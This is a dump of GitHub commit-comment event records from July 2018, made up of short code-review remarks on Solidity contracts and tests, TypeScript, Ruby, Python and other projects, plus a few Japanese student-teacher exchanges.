{"id":"7976912783","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29735191,"position":84,"line":66,"path":"contracts/Remittance.sol","commit_id":"e572e9501219ab51a52d241092544c6610b6c9ae","created_at":"2018-07-17T14:01:45Z","updated_at":"2018-07-17T14:01:45Z","author_association":"NONE","body":"This is the second time you `SLOAD` `.exchange`."}},"created_at":"2018-07-17T14:01:45Z"}
{"id":"7976916460","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29735203,"position":5,"line":8,"path":"contracts/Remittance.sol","commit_id":"e572e9501219ab51a52d241092544c6610b6c9ae","created_at":"2018-07-17T14:02:18Z","updated_at":"2018-07-17T14:02:18Z","author_association":"NONE","body":"Can you find a way to not have to save the `exchange` and yet be equally safe?"}},"created_at":"2018-07-17T14:02:18Z"}
{"id":"7976917285","type":"CommitCommentEvent","actor":{"login":"alloy"},"repo":{"name":"artsy/emission"},"payload":{"comment":{"id":29735207,"position":76,"line":159,"path":"src/lib/Components/Bidding/Screens/Registration.tsx","commit_id":"55d152c19cef8857b692cf1b89f106630e7b334a","created_at":"2018-07-17T14:02:26Z","updated_at":"2018-07-17T14:02:26Z","author_association":"COLLABORATOR","body":"Instead of using lodash’s `get` and lose type checking/intellisense, you could use the `__typename` field to determine what branch to take. E.g.\r\n\r\n```graphql\r\ncreditCardOrError {\r\n  __typename\r\n  ... on CreditCardMutationSuccess {\r\n    # ...\r\n  }\r\n  ... on CreditCardMutationFailure {\r\n    # ...\r\n  }\r\n}\r\n```\r\n\r\n```tsx\r\n// Theoretically the `errors` param should already be typed as `PayloadError[]` https://github.com/DefinitelyTyped/DefinitelyTyped/blob/91f8a6b7d1ef61cc543d0901dcc004b846283345/types/relay-runtime/index.d.ts#L1004-L1015\r\nonCompleted: (data: RegistrationCreateCreditCardMutationResponse, errors: PayloadError[]) => {\r\n  if (!isEmpty(errors)) {\r\n    this.presentErrorModal(errors, null)\r\n  } else {\r\n    const { creditCardOrError } = data.createCreditCard\r\n    if (creditCardOrError.__typename === \"CreditCardMutationFailure\") {\r\n      // If we (in our Relay TS plugin) are generating the types correct,\r\n      // then inside this branch TS should know that `creditCardOrError`\r\n      // can only be `CreditCardMutationFailure` and so you should be\r\n      // able to treat it in this branch as if it’s the only data that could be\r\n      // in `creditCardOrError`.\r\n      const { mutationError } = creditCardOrError\r\n      this.presentErrorModal(mutationError, mutationError.detail)\r\n    } else {\r\n      this.createBidder()\r\n    }\r\n  }\r\n}\r\n```\r\n\r\nAdditionally, you could do something like the following to ensure that your call-site passes the correct data:\r\n\r\n```tsx\r\ntype MutationError = RegistrationCreateCreditCardMutationResponse[\"createCreditCard\"][\"creditCardOrError\"][\"mutationError\"]\r\n\r\npresentErrorModal(errors: PayloadError[] | MutationError, mutationMessage?: string) {\r\n  // ...\r\n}\r\n```"}},"created_at":"2018-07-17T14:02:26Z"}
{"id":"7976919416","type":"CommitCommentEvent","actor":{"login":"gkulkarni05"},"repo":{"name":"gkulkarni05/configure_ldap_server"},"payload":{"comment":{"id":29735212,"position":null,"line":null,"path":null,"commit_id":"b939d7c2b692e7dba5f139763b0d61d8458cf338","created_at":"2018-07-17T14:02:45Z","updated_at":"2018-07-17T14:02:45Z","author_association":"OWNER","body":"Configure openldap server on RHEL 7 "}},"created_at":"2018-07-17T14:02:45Z"}
{"id":"7976922695","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29735218,"position":92,"line":72,"path":"contracts/Remittance.sol","commit_id":"e572e9501219ab51a52d241092544c6610b6c9ae","created_at":"2018-07-17T14:03:17Z","updated_at":"2018-07-17T14:03:17Z","author_association":"NONE","body":"I disagree with `\"Current date is lower than time limit\"`. What you tested instead `\"The whatever date you passed as an argument is lower than time limit\"`."}},"created_at":"2018-07-17T14:03:17Z"}
{"id":"7976925354","type":"CommitCommentEvent","actor":{"login":"NicoCG"},"repo":{"name":"EduardoPires/EquinoxProject"},"payload":{"comment":{"id":29735222,"position":null,"line":null,"path":null,"commit_id":"019e4c13568116500c8335f17d1b157ab499c797","created_at":"2018-07-17T14:03:42Z","updated_at":"2018-07-17T14:03:42Z","author_association":"NONE","body":"@EduardoPires please respond."}},"created_at":"2018-07-17T14:03:42Z"}
{"id":"7976926150","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29735223,"position":96,"line":73,"path":"contracts/Remittance.sol","commit_id":"e572e9501219ab51a52d241092544c6610b6c9ae","created_at":"2018-07-17T14:03:49Z","updated_at":"2018-07-17T14:03:49Z","author_association":"NONE","body":"Second time you `SLOAD``.amount`."}},"created_at":"2018-07-17T14:03:49Z"}
{"id":"7976927369","type":"CommitCommentEvent","actor":{"login":"JBYoshi"},"repo":{"name":"SpongePowered/SpongeForge"},"payload":{"comment":{"id":29735224,"position":50,"line":50,"path":"src/main/java/org/spongepowered/mod/mixin/optimization/threadchecks/MixinSpongeImplHooks_ThreadChecks.java","commit_id":"e37fa119fa73a9a2819ad68a0d9ff8bb436f0459","created_at":"2018-07-17T14:04:01Z","updated_at":"2018-07-17T14:04:01Z","author_association":"MEMBER","body":"Will this still work when the client has finished starting up but the integrated server is not running (such as when the client is connected to another server)?"}},"created_at":"2018-07-17T14:04:01Z"}
{"id":"7976933771","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29735236,"position":89,"line":70,"path":"contracts/Remittance.sol","commit_id":"e572e9501219ab51a52d241092544c6610b6c9ae","created_at":"2018-07-17T14:04:58Z","updated_at":"2018-07-17T14:04:58Z","author_association":"NONE","body":"If you remove this check, you let a good Samaritan claim it on behalf of someone else. This good Samaritan could be an alarm clock service."}},"created_at":"2018-07-17T14:04:58Z"}
{"id":"7976936147","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29735239,"position":108,"line":81,"path":"contracts/Remittance.sol","commit_id":"e572e9501219ab51a52d241092544c6610b6c9ae","created_at":"2018-07-17T14:05:20Z","updated_at":"2018-07-17T14:05:20Z","author_association":"NONE","body":"Second time you `SLOAD` `ownersFee`."}},"created_at":"2018-07-17T14:05:20Z"}
{"id":"7976943283","type":"CommitCommentEvent","actor":{"login":"cenka"},"repo":{"name":"cenakas/First-Python-programs"},"payload":{"comment":{"id":29735250,"position":14,"line":14,"path":"ex17a.py","commit_id":"109780c78666a4370fa307023caee0eaaf492722","created_at":"2018-07-17T14:06:26Z","updated_at":"2018-07-17T14:06:26Z","author_association":"COLLABORATOR","body":"`connection_to_file_2 = open(file_2, \"w\")`\r\n\r\n`with open(file_1, \"r\") as connection_to_file_1: connection_to_file_2.write(connection_to_file_1.read())`"}},"created_at":"2018-07-17T14:06:26Z"}
{"id":"7976943390","type":"CommitCommentEvent","actor":{"login":"codeonwort"},"repo":{"name":"codeonwort/pathosengine"},"payload":{"comment":{"id":29735251,"position":5,"line":27,"path":"projects/PathosEngine/src/pathos/render/deferred/deferredpass_pack_wireframe.cpp","commit_id":"e94cb9bf3884eaabb0b60df9b1c58d3737a52717","created_at":"2018-07-17T14:06:27Z","updated_at":"2018-07-17T14:06:27Z","author_association":"OWNER","body":"WTF was I doing?"}},"created_at":"2018-07-17T14:06:27Z"}
{"id":"7976944976","type":"CommitCommentEvent","actor":{"login":"phadej"},"repo":{"name":"futurice/haskell-mega-repo"},"payload":{"comment":{"id":29735256,"position":33,"line":33,"path":"library-app/src/Futurice/App/Library/Types.hs","commit_id":"7b53107ad28a649b55bcb1d66787c10163a787f9","created_at":"2018-07-17T14:06:42Z","updated_at":"2018-07-17T14:06:42Z","author_association":"MEMBER","body":"@neurogoo Word32"}},"created_at":"2018-07-17T14:06:42Z"}
{"id":"7976945584","type":"CommitCommentEvent","actor":{"login":"phadej"},"repo":{"name":"futurice/haskell-mega-repo"},"payload":{"comment":{"id":29735257,"position":45,"line":45,"path":"library-app/src/Futurice/App/Library/Types.hs","commit_id":"7b53107ad28a649b55bcb1d66787c10163a787f9","created_at":"2018-07-17T14:06:48Z","updated_at":"2018-07-17T14:06:48Z","author_association":"MEMBER","body":"indentation"}},"created_at":"2018-07-17T14:06:48Z"}
{"id":"7976946808","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29735258,"position":8,"line":18,"path":"test/Remittance.js","commit_id":"e572e9501219ab51a52d241092544c6610b6c9ae","created_at":"2018-07-17T14:06:59Z","updated_at":"2018-07-17T14:06:59Z","author_association":"NONE","body":"Mmh, why not have the test hash the password for you instead of increasing the risk of a mismatch?"}},"created_at":"2018-07-17T14:06:59Z"}
{"id":"7976951178","type":"CommitCommentEvent","actor":{"login":"shtukas"},"repo":{"name":"guardian/techtime"},"payload":{"comment":{"id":29735269,"position":null,"line":null,"path":null,"commit_id":"43b36c265a2f43247d0c711e129990fbcd2f6824","created_at":"2018-07-17T14:07:39Z","updated_at":"2018-07-17T14:07:39Z","author_association":"COLLABORATOR","body":"> unix one liner to add a newline at the end of a file even if the file is empty.\r\nBy @aug24 "}},"created_at":"2018-07-17T14:07:39Z"}
{"id":"7976955000","type":"CommitCommentEvent","actor":{"login":"phadej"},"repo":{"name":"futurice/haskell-mega-repo"},"payload":{"comment":{"id":29735280,"position":53,"line":53,"path":"library-app/src/Futurice/App/Library/Types/Library.hs","commit_id":"7b53107ad28a649b55bcb1d66787c10163a787f9","created_at":"2018-07-17T14:08:14Z","updated_at":"2018-07-17T14:08:14Z","author_association":"MEMBER","body":"always 4 spaces"}},"created_at":"2018-07-17T14:08:14Z"}
{"id":"7976957263","type":"CommitCommentEvent","actor":{"login":"cenka"},"repo":{"name":"cenakas/First-Python-programs"},"payload":{"comment":{"id":29735285,"position":14,"line":14,"path":"ex17a.py","commit_id":"109780c78666a4370fa307023caee0eaaf492722","created_at":"2018-07-17T14:08:34Z","updated_at":"2018-07-17T14:08:34Z","author_association":"COLLABORATOR","body":"ewentualnie o to mogło chodzić ` shutil.copyfile(src, dst, *, follow_symlinks=True)`\r\nto jest funkcja z pakietu jakiegos do operacji na plikach\r\nhttps://docs.python.org/3/library/shutil.html"}},"created_at":"2018-07-17T14:08:34Z"}
{"id":"7976958547","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29735287,"position":75,"line":76,"path":"test/Remittance.js","commit_id":"e572e9501219ab51a52d241092544c6610b6c9ae","created_at":"2018-07-17T14:08:46Z","updated_at":"2018-07-17T14:08:46Z","author_association":"NONE","body":"No testing on the deadline? Maybe your event is incomplete."}},"created_at":"2018-07-17T14:08:46Z"}
{"id":"7976961571","type":"CommitCommentEvent","actor":{"login":"cenka"},"repo":{"name":"cenakas/First-Python-programs"},"payload":{"comment":{"id":29735293,"position":11,"line":11,"path":"ex17a.py","commit_id":"109780c78666a4370fa307023caee0eaaf492722","created_at":"2018-07-17T14:09:15Z","updated_at":"2018-07-17T14:09:15Z","author_association":"COLLABORATOR","body":"`connection_to_file_1.close()`\r\n`connection_to_file_2.close()`"}},"created_at":"2018-07-17T14:09:15Z"}
{"id":"7976963873","type":"CommitCommentEvent","actor":{"login":"zilav"},"repo":{"name":"TES5Edit/TES5Edit"},"payload":{"comment":{"id":29735294,"position":5,"line":149,"path":"wbLOD.pas","commit_id":"5c2bd7871e8356c8a3da43b269e9445f5cb27f76","created_at":"2018-07-17T14:09:37Z","updated_at":"2018-07-17T14:09:37Z","author_association":"CONTRIBUTOR","body":"This should stay Cardinal because entire record is used to parse binary LOD files"}},"created_at":"2018-07-17T14:09:37Z"}
{"id":"7976966804","type":"CommitCommentEvent","actor":{"login":"fabioberger"},"repo":{"name":"0xProject/0x-monorepo"},"payload":{"comment":{"id":29735302,"position":20,"line":19,"path":"packages/order-utils/src/asset_proxy_utils.ts","commit_id":"08d22d2f3c358b61699459f54ac191ee91827da3","created_at":"2018-07-17T14:10:05Z","updated_at":"2018-07-17T14:10:05Z","author_association":"CONTRIBUTOR","body":"@Recmo @abandeali1 please never do this again. The way to handle this situation is to add the type defs to the `typescript-typings` package until we update the one on `DefinitivelyTyped`. Please do this from now on."}},"created_at":"2018-07-17T14:10:05Z"}
{"id":"7976968494","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29735305,"position":71,"line":73,"path":"test/Remittance.js","commit_id":"e572e9501219ab51a52d241092544c6610b6c9ae","created_at":"2018-07-17T14:10:20Z","updated_at":"2018-07-17T14:10:20Z","author_association":"NONE","body":"A stronger test is `assert.equal(txObj.receipt.logs.length,1` because an event goes into `txObj.logs` only if it recognised."}},"created_at":"2018-07-17T14:10:20Z"}
{"id":"7976970879","type":"CommitCommentEvent","actor":{"login":"krispad"},"repo":{"name":"spyder-ide/spyder"},"payload":{"comment":{"id":29735310,"position":null,"line":null,"path":null,"commit_id":"33bea3048b71afe66529c18a1a48e5c4033f02c2","created_at":"2018-07-17T14:10:42Z","updated_at":"2018-07-17T14:10:42Z","author_association":"NONE","body":"Works. Thanks.\r\n"}},"created_at":"2018-07-17T14:10:42Z"}
{"id":"7976973241","type":"CommitCommentEvent","actor":{"login":"KimMcMahon"},"repo":{"name":"kubernetes/website"},"payload":{"comment":{"id":29735314,"position":null,"line":null,"path":null,"commit_id":"f1ba04e93fcfd174a9260d34d3d37e927d6001a8","created_at":"2018-07-17T14:11:05Z","updated_at":"2018-07-17T14:11:05Z","author_association":"NONE","body":"/approve @kbarnard10 "}},"created_at":"2018-07-17T14:11:05Z"}
{"id":"7976975696","type":"CommitCommentEvent","actor":{"login":"n18023"},"repo":{"name":"n18023/programming-term2"},"payload":{"comment":{"id":29735321,"position":null,"line":null,"path":null,"commit_id":"ef70aeb2e14440b35e136922c0f79b96a7644e11","created_at":"2018-07-17T14:11:27Z","updated_at":"2018-07-17T14:11:27Z","author_association":"OWNER","body":"金城先生\r\n\r\n御忙しい中失礼致します。御褒めの言葉ありがとうございます!でも、これ以上出来そうにないです。すいません泣。出来そうにないのですが、やってみようかと思っております。\r\n 平敷大賀\r\n\r\n2018년 7월 17일 (화) 오후 9:28, kinjo-icolle <notifications@github.com>님이 작성:\r\n\r\n> 課題だいぶいい所までいきましたね。\r\n> 上2行と左側の見出しを表示出来れば完成系です。\r\n> もし余裕があればやってみてくださいね。\r\n>\r\n> —\r\n> You are receiving this because you authored the thread.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/n18023/programming-term2/commit/ef70aeb2e14440b35e136922c0f79b96a7644e11#commitcomment-29734017>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/Alf58_EVHslgfPV5yGRPYXO8mcdU7PZ8ks5uHdiDgaJpZM4VSwOE>\r\n> .\r\n>\r\n"}},"created_at":"2018-07-17T14:11:27Z"}
{"id":"7976976195","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29735322,"position":80,"line":80,"path":"test/Remittance.js","commit_id":"e572e9501219ab51a52d241092544c6610b6c9ae","created_at":"2018-07-17T14:11:32Z","updated_at":"2018-07-17T14:11:32Z","author_association":"NONE","body":"Perhaps you can take this little calculation into a separate function that takes `tx` and `receipt`."}},"created_at":"2018-07-17T14:11:32Z"}
{"id":"7976977243","type":"CommitCommentEvent","actor":{"login":"calohmn"},"repo":{"name":"eclipse/hono"},"payload":{"comment":{"id":29735325,"position":14,"line":177,"path":"client/src/main/java/org/eclipse/hono/client/impl/AbstractSender.java","commit_id":"d80b5005252175f642d1d638e18add48aaf7581b","created_at":"2018-07-17T14:11:41Z","updated_at":"2018-07-17T14:11:41Z","author_association":"CONTRIBUTOR","body":"@sophokles73 The cause of the error got lost with this change. How about logging the error here and also setting the `msg` param on the `ServerErrorException` constructor call? "}},"created_at":"2018-07-17T14:11:41Z"}
{"id":"7976979252","type":"CommitCommentEvent","actor":{"login":"calohmn"},"repo":{"name":"eclipse/hono"},"payload":{"comment":{"id":29735331,"position":31,"line":191,"path":"client/src/main/java/org/eclipse/hono/client/impl/AbstractSender.java","commit_id":"d80b5005252175f642d1d638e18add48aaf7581b","created_at":"2018-07-17T14:11:59Z","updated_at":"2018-07-17T14:11:59Z","author_association":"CONTRIBUTOR","body":"@sophokles73 Same as above."}},"created_at":"2018-07-17T14:11:59Z"}
{"id":"7976985784","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/ReentrantIssue"},"payload":{"comment":{"id":29735342,"position":45,"line":45,"path":"contracts/HoneyProcessor.sol","commit_id":"44a5860753abe842e0029718c4e51376598de087","created_at":"2018-07-17T14:12:58Z","updated_at":"2018-07-17T14:12:58Z","author_association":"NONE","body":"Correct, the error was only in 0.4.5.\r\n\r\nCoordination in a single transaction is very good but not enough. What you have to do at the end of the transaction is something like `require(myBalanceAfterAttack > myBalanceBeforeAttack)`."}},"created_at":"2018-07-17T14:12:58Z"}
{"id":"7976990662","type":"CommitCommentEvent","actor":{"login":"asfernandes"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":29735350,"position":5,"line":66,"path":"src/msgs/messages2.sql","commit_id":"32ca23b4fc17d01c09e6400a41e313163ee4559a","created_at":"2018-07-17T14:13:43Z","updated_at":"2018-07-17T14:13:43Z","author_association":"MEMBER","body":"That comments seems to assume outdated assumptions, like when there where no `@n` syntax for the messages.\r\n\r\nThe real \"problem\" someone in an old version may have, with a pre-v4 messages without the parameter, is not any different than if he gets a new v4 message that he does not have."}},"created_at":"2018-07-17T14:13:43Z"}
{"id":"7976993003","type":"CommitCommentEvent","actor":{"login":"dcs619"},"repo":{"name":"SparkDevNetwork/Rock"},"payload":{"comment":{"id":29735356,"position":null,"line":null,"path":null,"commit_id":"8c81fe9a76eb111eb036412fc4299880a3e3b1ce","created_at":"2018-07-17T14:14:05Z","updated_at":"2018-07-17T14:14:05Z","author_association":"COLLABORATOR","body":"@MikeDPeterson what does this mean if we already updated to the new caching namespace?"}},"created_at":"2018-07-17T14:14:05Z"}
{"id":"7976993030","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"JerikoQ/RoR"},"payload":{"comment":{"id":29735357,"position":1,"line":1,"path":"Lession1/1.rb","commit_id":"7735fe369b63583167a2691d37b5e2972a560462","created_at":"2018-07-17T14:14:06Z","updated_at":"2018-07-17T14:14:06Z","author_association":"NONE","body":"для всех файлов:\r\nлучше именовать файлы в соответствии с задачей, к примеру `ideal_weight.rb`\r\n"}},"created_at":"2018-07-17T14:14:06Z"}
{"id":"7976997159","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"JerikoQ/RoR"},"payload":{"comment":{"id":29735362,"position":12,"line":12,"path":"Lession1/1.rb","commit_id":"7735fe369b63583167a2691d37b5e2972a560462","created_at":"2018-07-17T14:14:41Z","updated_at":"2018-07-17T14:14:41Z","author_association":"NONE","body":"приведение полученного значения к числу лучше делать в момент получения, а не в момент использования\r\n"}},"created_at":"2018-07-17T14:14:41Z"}
{"id":"7977000387","type":"CommitCommentEvent","actor":{"login":"AndrewJCallow"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29735366,"position":51,"line":19,"path":"test/tests.js","commit_id":"b6f3d1d0858a9a509b0a69b3f9a399e4a8534c6d","created_at":"2018-07-17T14:15:09Z","updated_at":"2018-07-17T14:15:09Z","author_association":"OWNER","body":"ok, tx for the tip"}},"created_at":"2018-07-17T14:15:09Z"}
{"id":"7977003809","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"JerikoQ/RoR"},"payload":{"comment":{"id":29735374,"position":18,"line":18,"path":"Lession1/1.rb","commit_id":"7735fe369b63583167a2691d37b5e2972a560462","created_at":"2018-07-17T14:15:37Z","updated_at":"2018-07-17T14:15:37Z","author_association":"NONE","body":"здесь и далее везде:\r\nнайди для своего редактора автодобавление пустой строки в конце файла, чтобы не было красной стрелки на ГитХабе и вручную не приходилось добавлять строки в каждом файле"}},"created_at":"2018-07-17T14:15:37Z"}
{"id":"7977007875","type":"CommitCommentEvent","actor":{"login":"HenriqueCaires"},"repo":{"name":"HenriqueCaires/ZabbixApi"},"payload":{"comment":{"id":29735385,"position":null,"line":null,"path":null,"commit_id":"22685198f09f04e2e46447fa4f16fa6e3f98d416","created_at":"2018-07-17T14:16:11Z","updated_at":"2018-07-17T14:16:11Z","author_association":"OWNER","body":"No, you can install a 3.0 Zabbix and try, for 1 day delay the result is:\r\n```javascript\r\n{\r\n    \"jsonrpc\": \"2.0\",\r\n    \"result\": [\r\n        {\r\n...\r\n            \"delay\": \"86400\",\r\n...\r\n        }\r\n    ],\r\n    ...\r\n}\r\n```\r\nAnd there is no problem on deserialize \"86400\" as an int\r\nBut, yes, I could solve it on deserialization. If you want, you can create an issue"}},"created_at":"2018-07-17T14:16:11Z"}
{"id":"7977010675","type":"CommitCommentEvent","actor":{"login":"BunnyPi04"},"repo":{"name":"thanhsangcao/learn_laravel"},"payload":{"comment":{"id":29735396,"position":10,"line":10,"path":"app/Http/Controllers/Admin/PagesController.php","commit_id":"ec7e1ba561ac3229df7884eb5b4c32136f23f214","created_at":"2018-07-17T14:16:34Z","updated_at":"2018-07-17T14:16:34Z","author_association":"NONE","body":"1 tab: indent = 4 spaces nhé"}},"created_at":"2018-07-17T14:16:34Z"}
{"id":"7977010965","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"JerikoQ/RoR"},"payload":{"comment":{"id":29735397,"position":14,"line":14,"path":"Lession1/1.rb","commit_id":"7735fe369b63583167a2691d37b5e2972a560462","created_at":"2018-07-17T14:16:36Z","updated_at":"2018-07-17T14:16:36Z","author_association":"NONE","body":"ты уже вычислял это выражение в 12 строке, надо испоользовать здесь это значение\r\nк чему повторные вычисления?"}},"created_at":"2018-07-17T14:16:36Z"}
{"id":"7977011339","type":"CommitCommentEvent","actor":{"login":"n18023"},"repo":{"name":"n18023/programming-term2"},"payload":{"comment":{"id":29735398,"position":null,"line":null,"path":null,"commit_id":"826213dea4f1fbe5f6b529590805e94d8ecb83b2","created_at":"2018-07-17T14:16:39Z","updated_at":"2018-07-17T14:16:39Z","author_association":"OWNER","body":"金城先生\r\n\r\n御忙しい中失礼致します。配置するディレクトリ間違えてましたか、すいませんm(_\r\n_)m早急に移動させておこうと思っております。アスタリスクは箇条書きを書く時だけなんですね。ありがとうございます。覚えておきます。あと、敬語の使い方等、間違っている所が有れば、教えて頂けると嬉しいです。\r\n 平敷大賀\r\n\r\n2018년 7월 17일 (화) 오후 9:43, kinjo-icolle <notifications@github.com>님이 작성:\r\n\r\n> マークダウン形式、ちゃんと表示出来てますね。配置するディレクトリだけ問題文のpathと違います。\r\n> 下記ディレクトリにgit mvで移動してみてください。\r\n> src/algo-s2/ → docs/algo-s2/\r\n>\r\n> アスタリスクで書くのは「箇条書き」と覚えておいて、文章の部分は何もつけずただ書いて良いですよ。\r\n> 例えば、\r\n> ・if\r\n> ・for\r\n> ・while\r\n> みたいに箇条書きでリスト表示したい時に使います。\r\n>\r\n> —\r\n> You are receiving this because you authored the thread.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/n18023/programming-term2/commit/826213dea4f1fbe5f6b529590805e94d8ecb83b2#commitcomment-29734226>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/Alf581vSQlj4sNeuO5_r_JWossWcg55wks5uHdv8gaJpZM4VSxn->\r\n> .\r\n>\r\n"}},"created_at":"2018-07-17T14:16:39Z"}
{"id":"7977014290","type":"CommitCommentEvent","actor":{"login":"aciidb0mb3r"},"repo":{"name":"apple/swift-package-manager"},"payload":{"comment":{"id":29735406,"position":200,"line":292,"path":"Sources/PackageDescription4/Package.swift","commit_id":"f2988906bff5362881d7dda17f740a658e662bb5","created_at":"2018-07-17T14:17:08Z","updated_at":"2018-07-17T14:17:08Z","author_association":"MEMBER","body":"The APIs with \"Item\" suffix are supposed to be an implementation detail. However, that is not very clear and users understand the `_` prefix better. PackageDescription API v4.2 adds a `_` prefix to such APIs which makes the distinction clearer.\r\n\r\nPlease use the APIs which are intended for public use, for e.g.: https://github.com/apple/swift-package-manager/blob/master/Sources/PackageDescription4/Target.swift#L189"}},"created_at":"2018-07-17T14:17:08Z"}
{"id":"7977016829","type":"CommitCommentEvent","actor":{"login":"BunnyPi04"},"repo":{"name":"thanhsangcao/learn_laravel"},"payload":{"comment":{"id":29735412,"position":29,"line":34,"path":"app/Http/Controllers/Admin/UsersController.php","commit_id":"ec7e1ba561ac3229df7884eb5b4c32136f23f214","created_at":"2018-07-17T14:17:30Z","updated_at":"2018-07-17T14:17:30Z","author_association":"NONE","body":"convention"}},"created_at":"2018-07-17T14:17:30Z"}
{"id":"7977017220","type":"CommitCommentEvent","actor":{"login":"AndrewJCallow"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29735413,"position":73,"line":33,"path":"test/tests.js","commit_id":"b6f3d1d0858a9a509b0a69b3f9a399e4a8534c6d","created_at":"2018-07-17T14:17:34Z","updated_at":"2018-07-17T14:17:34Z","author_association":"OWNER","body":"I'm really confused how to create a new Splitter inside an 'it' statement and pass it down the chain _as well_ as passing the benefactor. Would you be able to help please? I don't really understand the scoping rules. I've run out of time today because I spent alot of time trying to get geth working with prepopulated accounts and ether."}},"created_at":"2018-07-17T14:17:34Z"}
{"id":"7977017256","type":"CommitCommentEvent","actor":{"login":"MathieuRoger"},"repo":{"name":"CAST-projects/dmtcompilationdatabasediscoverer"},"payload":{"comment":{"id":29735414,"position":14,"line":246,"path":"discoverer/CAST-Discoverer-CPP-CompilDB/sources/com/castsoftware/dmt/discoverer/cpp/compilationdatabase/CompileFile.java","commit_id":"9ec06d61d55c4cd935b3cb56393de058b693ef16","created_at":"2018-07-17T14:17:34Z","updated_at":"2018-07-17T14:17:34Z","author_association":"NONE","body":"I would add \r\nmacroValue= \"\";"}},"created_at":"2018-07-17T14:17:34Z"}
{"id":"7977019062","type":"CommitCommentEvent","actor":{"login":"gjpgoodwin"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":29735418,"position":null,"line":null,"path":null,"commit_id":"b71f3358e0d0bcfcb8a03e5ee222f38d460d70dc","created_at":"2018-07-17T14:17:50Z","updated_at":"2018-07-17T14:17:50Z","author_association":"NONE","body":"we are looking for a way for the highlighting to be dark green (such as in line 192 above) on the exact changes and light green on the line of the change where the affected change was made This is easily seen in STASH\r\n\r\nso if \r\nx=4    was changed to x=3  on the x=4 the line would be light red, except the 4 which would be dark red.\r\nx= 3  the line would be light green except for the 3 which would be dark green   (if all that makes sense)"}},"created_at":"2018-07-17T14:17:50Z"}
{"id":"7977021433","type":"CommitCommentEvent","actor":{"login":"chermsdorf"},"repo":{"name":"CoolProp/CoolProp"},"payload":{"comment":{"id":29735419,"position":null,"line":null,"path":null,"commit_id":"0fdc8b2125bc011e99117b456eef672656be7ef9","created_at":"2018-07-17T14:18:12Z","updated_at":"2018-07-17T14:18:12Z","author_association":"NONE","body":"Hi Ian,\r\n\r\nactually I have no idea how to do so. I am not a software developper and have never worked with git before. I am just an engineer who wants to use the CoolProp library via the ExternalMedia package with OpenModelica on either Linux or Win64. \r\n\r\nActually I have the feeling that a lot of the dependencies in the ExernalMedia repo are messed up and that it is no longer possible to compile the ExternalMedia library for Linux unless the dependencies are fixed. Unfortunaltely I am not capeabale in doing so.\r\n\r\nregards\r\nChristian\r\n"}},"created_at":"2018-07-17T14:18:12Z"}
{"id":"7977023662","type":"CommitCommentEvent","actor":{"login":"AndrewJCallow"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29735425,"position":71,"line":31,"path":"test/tests.js","commit_id":"b6f3d1d0858a9a509b0a69b3f9a399e4a8534c6d","created_at":"2018-07-17T14:18:31Z","updated_at":"2018-07-17T14:18:31Z","author_association":"OWNER","body":"Thanks, I 'forgot' you could pass in the transaction parameters."}},"created_at":"2018-07-17T14:18:31Z"}
{"id":"7977025028","type":"CommitCommentEvent","actor":{"login":"seabornlee"},"repo":{"name":"wangyongst/mars-rover"},"payload":{"comment":{"id":29735430,"position":26,"line":26,"path":"src/main/java/com/myweb/Rover.java","commit_id":"882e37bda7638cabfb1878bfc7e3a04eb2c2e7a2","created_at":"2018-07-17T14:18:44Z","updated_at":"2018-07-17T14:18:44Z","author_association":"NONE","body":"这两个转化可以用一个数据结构来实现。"}},"created_at":"2018-07-17T14:18:44Z"}
{"id":"7977027818","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29735436,"position":6,"line":228,"path":"compiler/backend/src/org/jetbrains/kotlin/codegen/coroutines/CoroutineCodegen.kt","commit_id":"92b067b63429561778dd7979c33b664e7b0aadfd","created_at":"2018-07-17T14:19:10Z","updated_at":"2018-07-17T14:19:10Z","author_association":"MEMBER","body":"Why not just `List`?"}},"created_at":"2018-07-17T14:19:10Z"}
